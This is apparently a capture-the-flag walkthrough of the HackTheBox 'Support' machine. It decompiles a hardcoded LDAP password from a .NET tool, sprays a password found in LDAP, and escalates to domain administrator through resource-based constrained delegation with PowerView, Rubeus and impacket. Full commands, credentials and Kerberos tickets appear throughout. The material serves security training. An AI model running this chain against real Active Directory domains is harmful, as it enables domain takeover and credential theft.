Post

HackTheBox-Support

HackTheBox-Support

SMB-enum

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
➜  Support nxc smb 10.10.11.174 
SMB         10.10.11.174    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)

➜  Support smbclient -L \\support.htb
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to support.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Decompile exe file

if its Mono/.Net assembly then go dnspy

if its not we can check ida or ghidra for username

1
2
3
4
5
6
7
8
➜  Support cat ldapuser.txt 
                public LdapQuery()
                {
                        string password = Protected.getPassword();
                        this.entry = new DirectoryEntry("LDAP://support.htb", "support\\ldap", password);
                        this.entry.AuthenticationType = AuthenticationTypes.Secure;
                        this.ds = new DirectorySearcher(this.entry);
                }

for password

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
➜  Support cat getpassword.txt 
using System;
using System.Text;

namespace UserInfo.Services
{
        // Token: 0x02000006 RID: 6
        internal class Protected
        {
                // Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318
                public static string getPassword()
                {
                        byte[] array = Convert.FromBase64String(Protected.enc_password);
                        byte[] array2 = array;
                        for (int i = 0; i < array.Length; i++)
                        {
                                array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
                        }
                        return Encoding.Default.GetString(array2);
                }

                // Token: 0x04000005 RID: 5
                private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

                // Token: 0x04000006 RID: 6
                private static byte[] key = Encoding.ASCII.GetBytes("armando");
        }
}

crack pass

1
2
3
4
5
ldap : 
➜  Support python3 a.py 
Decrypted password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

ldapsearch

1
➜  Support ldapsearch -x -b "dc=support,dc=htb" -H ldap://10.10.11.174 -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' > ldapresult.txt

lets analyze it

1
2
3
4
➜  Support cat ldapresult.txt | grep "info"       
y with information about license issuance, for the purpose of tracking and re
298939 for more information.
info: Ironside47pleasure40Watchful

password-spray

1
2
3
➜  Support nxc smb support.htb -u users.txt -p 'Ironside47pleasure40Watchful' --continue-on-succes 

SMB         10.10.11.174    445    DC               [+] support.htb\support:Ironside47pleasure40Watchful

GenericAll-GetDomainTGT-addcomputer

WindowsAbuse

1
2
*Evil-WinRM* PS C:\Users\support\Documents> . .\PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> . .\Powermad.ps1

new-machine-account

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount osman -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose
Verbose: [+] Domain Controller = dc.support.htb
Verbose: [+] Domain = support.htb
Verbose: [+] SAMAccountName = osman$
Verbose: [+] Distinguished Name = CN=osman,CN=Computers,DC=support,DC=htb
[+] Machine account osman added
*Evil-WinRM* PS C:\Users\support\Documents> $ComputerSid = Get-DomainComputer osman -Properties objectsid | Select -Expand objectsid
*Evil-WinRM* PS C:\Users\support\Documents> $ComputerSid
S-1-5-21-1677581083-3380853377-188903654-5601
*Evil-WinRM* PS C:\Users\support\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"

*Evil-WinRM* PS C:\Users\support\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\Users\support\Documents> $SD.GetBinaryForm($SDBytes, 0)
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer dc.support.htb | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=support,DC=htb
Verbose: [Get-DomainObject] Extracted domain 'support.htb' from 'CN=DC,OU=Domain Controllers,DC=support,DC=htb'
Verbose: [Get-DomainSearcher] search base: LDAP://DC=support,DC=htb
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=DC,OU=Domain Controllers,DC=support,DC=htb)))
Verbose: [Set-DomainObject] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0 0 36 0 0 0 1 2 0 0 0 0 0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 27 219 253 99 129 186 131 201 230 112 66 11 225 21 0 0' for object 'DC$'

New-MachineAccount -MachineAccount osman -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose

$ComputerSid = Get-DomainComputer osman -Properties objectsid | Select -Expand objectsid

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer dc.support.htb | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

auth as fake computer

grab rc4
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
.\Rubeus.exe hash /password:Password123! /user:osman /domain:support.htb

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123! /user:osman /domain:support.htb

______        _
(_____ \      | |
_____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v2.2.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : Password123!
[*] Input username             : osman
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBosman
[*]       rc4_hmac             : 2B576ACBE6BCFDA7294D6BD18041B8FE
[*]       aes128_cts_hmac_sha1 : 70382F00AE681A23362CD9915267DCD0
[*]       aes256_cts_hmac_sha1 : 205DD641B921AB4B9A41B5AD2231B36992119B9FA052F8AEB88A2385806FE65C
[*]       des_cbc_md5          : 570BD398A2918649
s4u
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
Rubeus.exe s4u /user:osman$ /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt



*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:osman$ /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

______        _
(_____ \      | |
_____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: S4U

[*] Using rc4_hmac hash: 2B576ACBE6BCFDA7294D6BD18041B8FE
[*] Building AS-REQ (w/ preauth) for: 'support.htb\osman$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIFSDCCBUSgAwIBBaEDAgEWooIEYjCCBF5hggRaMIIEVqADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD
    AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBBwwggQYoAMCARKhAwIBAqKCBAoEggQG6PrnSoOx
    sJ+loFtWQDYnMS6yW9k1bNvrop04LUM5LAnQPPjDiRjlphyIrcmuVpjRqwy3vL3P9aPIUGIRwnLRqkBq
    9Q2fuYLcqIhWwt0weLbrapO4owrRx46AUSNq8aBdA/9oWkDsB6th633W2U3KSJtkXOI8YWMnJm777trn
    LJWiww6gOWV/o0g3Ethmcw1oiaFg/SveCtQgjIG/PLSLBFcq7nlNi34iySGtmRnOk/5RydhaSL+0czAO
    SNRN/kRpJgFgNutCKeKJqWLpahM6cV3s9xV1jDDkX/WvmsiHNI/Fim/6gCXSZRoG9jpCZctricQEmVEv
    9Op2RzFb1XEWUhoZuhhyl/7I1etyrjGzrlhtfSXfMfK737Q3Ch4ZvI5tH8jWstqJAdvhRyPeBfszCzuH
    FWcWKOkrp7gbdB4x5ea4x+j8MIhpkcntOzy5n9PcN+Kvr2tdTsujd9pif3EXc34FEHYodX08D4NfxNZt
    sCCGXkv6zDpjSx6qSNxYpRra2PFU2xkiTYTZfKm3q8L9N1iUwNhtXV9t4l1ea/9YI+WIDPk7qKnHxn1z
    GXMqz6wIXilkxJPwxCnqVnThPcDf479mPmVO5Ax7CEKhhZnIzBg7f5tMJUw/mNYrGi7oUcYHWi4g4gs3
    /THHq6WiYUaP5QV1E5bYiwqoVsAxZHtfPEMZcV2ow7pb1Yoa6M9xzzsPh4UZZ78BiUyoEcj6qxlttcSy
    oEv5fR+Fe1YAbcgHqpsCPLuh3dYUvmtixq3qe/jnL7t4Imia+7pqEKgLAGYXGH09C8dlS0jBcXHfudWa
    lE9DJjpVhgbcTQDthtCmzWHzQoPnj1ys/NcLpseBoGYcJ/fatSoygjx+p3HLNI6kWi+MszrbcDkOzGZ9
    vl7qtXBFm9mQappVztwEsU/rNir8o/b2SKsiMfn39ft3W9NGMQns+Ix0mSCdCrdmQN26o1IWtcHw42M2
    5T/mevgTO7jGP8dFKfK/q2NL2pV/k2W90ZrIg0+3n144FVJdkbjcWedM7vToRej3fEaSaofuCIIAFo6W
    OeGQGavT5Whb3+D8p4IZzXQmjCWCYjyV2SCi6/ZEgLCxGyuxIbfG+c7V0GTHEjMDqTceKNC3Rjd+8+/M
    KHmtc3JQfaBc8L/Y73wsRMhp/rNbQc3dQRS4NePgztllWJZQoHGIwiQKhVeWyk20+N9V8WEAZRlVzvAW
    qhEAnj9rMmwRCsSOPzUTm47Z+vTA0c3atbvAsOH2tEsTUlfVVuEsw6p0M/NcPcKYPiMGjm++dTBEesWM
    H182DTeZDp/1gdd231MNOheuYJ8xK06p4BnBxhyklZSjPVykuHVP9EqCrue3ZdPfQFQZhcaUXepYVJMH
    EWEn6qOB0TCBzqADAgEAooHGBIHDfYHAMIG9oIG6MIG3MIG0oBswGaADAgEXoRIEEIA/CTk918hj+G0P
    f0zbfAihDRsLU1VQUE9SVC5IVEKiEzARoAMCAQGhCjAIGwZvc21hbiSjBwMFAEDhAAClERgPMjAyNDEy
    MjAxMzAxMThaphEYDzIwMjQxMjIwMjMwMTE4WqcRGA8yMDI0MTIyNzEzMDExOFqoDRsLU1VQUE9SVC5I
    VEKpIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC3N1cHBvcnQuaHRi


[*] Action: S4U

[*] Building S4U2self request for: 'osman$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'osman$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

    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
    bWFuJA==

[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

    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
    Gw5kYy5zdXBwb3J0Lmh0Yg==
[+] Ticket successfully imported!

verify attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\support\Documents> klist

Current LogonId is 0:0xe0f55

Cached Tickets: (1)

#0>     Client: administrator @ SUPPORT.HTB
        Server: cifs/dc.support.htb @ SUPPORT.HTB
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 12/20/2024 5:01:19 (local)
        End Time:   12/20/2024 15:01:18 (local)
        Renew Time: 12/27/2024 5:01:18 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
*Evil-WinRM* PS C:\Users\support\Documents> 

Linux-Abuse

addcomputer

1
2
3
4
5
➜  Support impacket-addcomputer -computer-name 'irem$' -computer-pass Password321! -dc-ip 10.10.11.174 support/support:Ironside47pleasure40Watchful
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[!] No DC host set and 'support' doesn't look like a FQDN. DNS resolution of short names will probably fail.
[*] Successfully added machine account irem$ with password Password321!.

RBCD

1
2
3
4
5
6
7
8
9
10
➜  Support impacket-rbcd -action write -delegate-to "dc$" -delegate-from 'irem$' -dc-ip 10.10.11.174 support.htb/support:Ironside47pleasure40Watchful
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Accounts allowed to act on behalf of other identity:
[*]     osman$       (S-1-5-21-1677581083-3380853377-188903654-5601)
[*] Delegation rights modified successfully!
[*] irem$ can now impersonate users on dc$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     osman$       (S-1-5-21-1677581083-3380853377-188903654-5601)
[*]     irem$        (S-1-5-21-1677581083-3380853377-188903654-5602)

getST

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
➜  Support impacket-getST support.htb/irem$:Password321! -spn www/dc.support.htb -impersonate administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
/usr/share/doc/python3-impacket/examples/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/usr/share/doc/python3-impacket/examples/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow()
/usr/share/doc/python3-impacket/examples/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@www_dc.support.htb@SUPPORT.HTB.ccache

Video walkthrough WATCH!

This post is licensed under CC BY 4.0 by the author.